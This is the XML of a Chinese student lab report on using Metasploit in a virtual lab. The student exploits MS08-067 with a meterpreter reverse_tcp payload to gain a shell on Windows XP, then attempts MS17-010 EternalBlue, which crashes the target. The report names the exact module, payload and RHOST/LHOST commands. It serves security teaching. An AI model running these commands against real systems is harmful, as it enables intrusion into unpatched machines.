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 xml:space="preserve"> 软件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</w:rPr>
        <w:t xml:space="preserve">   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>信息安全导论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1527"/>
        <w:gridCol w:w="1085"/>
        <w:gridCol w:w="35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Times" w:eastAsia="黑体"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>201600301079</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="261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崔玉峰</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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2016级软件4班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"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:adjustRightInd w:val="0"/>
              <w:snapToGrid w:val="0"/>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:ind w:leftChars="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Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>实验题目：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:bookmarkStart w:id="0" w:name="_Toc530950998"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>实验</w:t>
            </w:r>
            <w:bookmarkEnd w:id="0"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>八安全测试平台Metasploit使用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4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实验学时：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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="46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实验日期：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2018/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实验目的：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  <w:p>
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLine="42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安全漏洞是安全方面的焦点问题。漏洞的发现是可遇而不可求的。漏洞的验证和使用也不是那么容易的。而</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Metasploit</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>是：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLine="420"/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ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>The world’s most used penetration testing framework.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:adjustRightInd w:val="0"/>
              <w:snapToGrid w:val="0"/>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/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宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>实验内容</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:num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安装</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Metasploit</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:num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用虚拟机建立目标机（target，测试攻击的目标）</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:line="30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测试MS08-067（选）</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:line="300" w:lineRule="auto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找一个新近的漏洞，重现演示</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24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硬件环境：</w:t>
            </w:r>
            <w:r>
              <w:t> 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  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CPU : intel-i5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RAM: 8G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软件环境：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虚拟机：VMWARE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操作系统：ubuntu 18.04.5 64位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        Windos xp sp3</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="240" w:firstLineChars="1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Metasploit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实验步骤与</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:hAnsi="Times" w:eastAsia="黑体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="20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spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:left="420" w:leftChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="22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>Linux下</w:t>
            </w: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</w:rPr>
              <w:t>安装Metasploit</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:left="840" w:leftChars="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  <w:t xml:space="preserve"> 安装curl 方便下载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</w:rPr>
              <w:t>Metasploit</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:left="840" w:leftChars="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  <w:t xml:space="preserve">通过curl命令下载安装 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</w:rPr>
              <w:t>Metasploit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eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>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 xml:space="preserve">         </w:t>
            </w:r>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="5096510" cy="893445"/>
                  <wp:effectExtent l="0" t="0" r="8890" b="190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10" cy="893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</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="240"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="3646170" cy="2735580"/>
                  <wp:effectExtent l="0" t="0" r="1143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70" cy="2735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jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="240"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="240"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="240"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="2371090" cy="2075180"/>
                  <wp:effectExtent l="0" t="0" r="1016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090" cy="207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</w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:left="840" w:leftChars="0"/>
              <w:jc w:val="both"/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 xml:space="preserve">安装 </w:t>
            </w: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</w:rPr>
              <w:t>Metasploit</w:t>
            </w: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>完成</w:t>
            </w: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eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="240"/>
            </w:pP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ind w:firstLine="1200" w:firstLineChars="50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  <w:t>输入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</w:rPr>
              <w:t>msfconsole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  <w:t xml:space="preserve"> 进入：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="240"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="240"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="240"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="4158615" cy="3120390"/>
                  <wp:effectExtent l="0" t="0" r="13335" b="381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615" cy="312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jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="240"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:left="420" w:leftChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="22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</w:rPr>
              <w:t>安装</w:t>
            </w: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>目标机Target：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 w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22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 xml:space="preserve">      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>本实验测试</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MS08-067</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>所以安装</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>XP/SP3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>进行实验，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>从可以直接在网上下载纯净版的windos XP SP3系统，并放到VMware虚拟机中即可:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="240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</w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="240"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="2903220" cy="2537460"/>
                  <wp:effectExtent l="0" t="0" r="11430" b="1524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253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  <w:t>做一下几个准备工作：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:ind w:left="1440" w:leftChars="0" w:firstLine="0" w:firstLineChars="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  <w:t>关闭防火墙</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:ind w:left="144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  <w:t>查询IP地址（121.250.213.15）</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:ind w:left="1440" w:leftChars="0" w:firstLine="0" w:firstLineChars="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1"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>在C盘中建一个文件夹test 方便之后测试</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="240"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="3322320" cy="2493010"/>
                  <wp:effectExtent l="0" t="0" r="11430" b="254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249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jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:left="420" w:leftChars="0"/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 xml:space="preserve"> 测试MS08-067：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 xml:space="preserve">       </w:t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2"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>查询攻击者的IP：121.250.213.41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查找漏洞ms08-067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</w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:color w:val="0070C0"/>
                <w:sz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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Search ms08-067</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="240"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="4764405" cy="1943100"/>
                  <wp:effectExtent l="0" t="0" r="17145" b="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405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</w:pP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加载模块ms08_067_netapi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firstLine="720" w:firstLineChars="300"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>use exploit/windows/smb/ms08_067_netapi</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="240"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="240"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="4706620" cy="613410"/>
                  <wp:effectExtent l="0" t="0" r="17780" b="1524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613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加载模块ms08_067_netapi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firstLine="720" w:firstLineChars="300"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>set payload windows/meterpreter/reverse_tcp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</w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="240"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="4721860" cy="574040"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="1651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860" cy="57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设置被攻击者IP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firstLine="720" w:firstLineChars="300"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>set RHOST 172.28.1.20</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="240"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="5128260" cy="546100"/>
                  <wp:effectExtent l="0" t="0" r="15240" b="635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54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设置攻击者IP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left="360" w:leftChars="0" w:firstLine="240" w:firstLineChars="100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ascii="宋体" w:hAnsi="宋体"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>set LHOST 172.28.1.22</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="24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130165" cy="477520"/>
                  <wp:effectExtent l="0" t="0" r="13335" b="1778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165" cy="47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设置成功开始攻击：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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>exploit</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="24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125720" cy="1438275"/>
                  <wp:effectExtent l="0" t="0" r="17780" b="952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20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rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="24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攻击成功已经控制了目标机，可以执行windos下的指令ipconfig:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="240"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="240"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="3329940" cy="2835275"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="3175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940" cy="283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jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="240"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>可以看到显示了目标机的IP地址</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
                <w:sz w:val="2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2"/>
                <w:szCs w:val="22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6"/>
              </w:numPr>
              <w:ind w:left="42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 xml:space="preserve"> 也可以增加添加文件等操作：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876040" cy="1247775"/>
                  <wp:effectExtent l="0" t="0" r="10160" b="9525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04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3478530" cy="2610485"/>
                  <wp:effectExtent l="0" t="0" r="7620" b="18415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530" cy="2610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</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:left="420" w:leftChars="0"/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 xml:space="preserve"> 测试MS17-010永恒之蓝：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:spacing w:line="300" w:lineRule="auto"/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spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:left="560" w:hanging="560" w:hangingChars="200"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="22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 xml:space="preserve">       </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>MS17-010永恒之蓝,就是最有名的比特币勒索病毒所利用的漏洞，通过此漏洞可以直接控制对方电脑，执行代码属于严重漏洞。本次就通过msf来模拟这个漏洞攻击目标主机windos xp sp3：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:left="560" w:hanging="440" w:hangingChars="200"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:ind w:left="420" w:leftChars="0" w:firstLine="240" w:firstLineChars="10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① Search smb_ms17_010</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:jc w:val="center"/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3346450" cy="2937510"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="1524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293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="420" w:leftChars="0" w:firstLine="240" w:firstLineChars="100"/>
              <w:jc w:val="both"/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 xml:space="preserve">② use exploit/windows/smb/ms17_010_eternalblue  </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:ind w:left="420" w:leftChars="0" w:firstLine="240" w:firstLineChars="10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③ set RHOST 121.250.213.15</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:ind w:left="420" w:leftChars="0" w:firstLine="210" w:firstLineChars="100"/>
              <w:jc w:val="center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492500" cy="486410"/>
                  <wp:effectExtent l="0" t="0" r="12700" b="889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="420" w:leftChars="0" w:firstLine="240" w:firstLineChars="10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>④ exploit</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:ind w:left="420" w:leftChars="0" w:firstLine="240" w:firstLineChars="10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 xml:space="preserve">   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4"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>开始攻击目标机器：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:ind w:left="420" w:leftChars="0" w:firstLine="210" w:firstLineChars="10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009390" cy="3008630"/>
                  <wp:effectExtent l="0" t="0" r="10160" b="1270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390" cy="3008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="420" w:leftChars="0" w:firstLine="240" w:firstLineChars="100"/>
              <w:jc w:val="both"/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4"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:ind w:left="420" w:leftChars="0" w:firstLine="480" w:firstLineChars="20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4"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>被攻击主机windos xp sp3 会突然蓝屏，然后无限重启。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:jc w:val="both"/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8"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="2940050" cy="2206625"/>
                  <wp:effectExtent l="0" t="0" r="12700" b="317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0" cy="220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rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="240"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="24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4"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>其实此次攻击并不能算是成功因为没有取得目标电脑的控制权，而是导致被攻击主机蓝屏，应该是选择的系统版本的问题。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="240"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="24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结论分析与体会：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通过实验安全测试平台Metasploit，了解到了如何测试漏洞，甚至利用漏洞进行攻击，也看到了不法分子利用漏洞时的恐怖。对于永恒之蓝漏洞是一个非常高危的漏洞，比特币勒索病毒席卷70多个国家地区，造成大量的财产损失。虽然在测试时并没有完美的成功，但是依然使被攻击主机死机，危害还是非常大的。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="480" w:firstLineChars="2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在日常生活中对抗漏洞的唯一办法就是使用正版系统并且经常更新，才能尽可能避免受到危害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  <w:bookmarkStart w:id="1" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="1"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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C208AF"/>
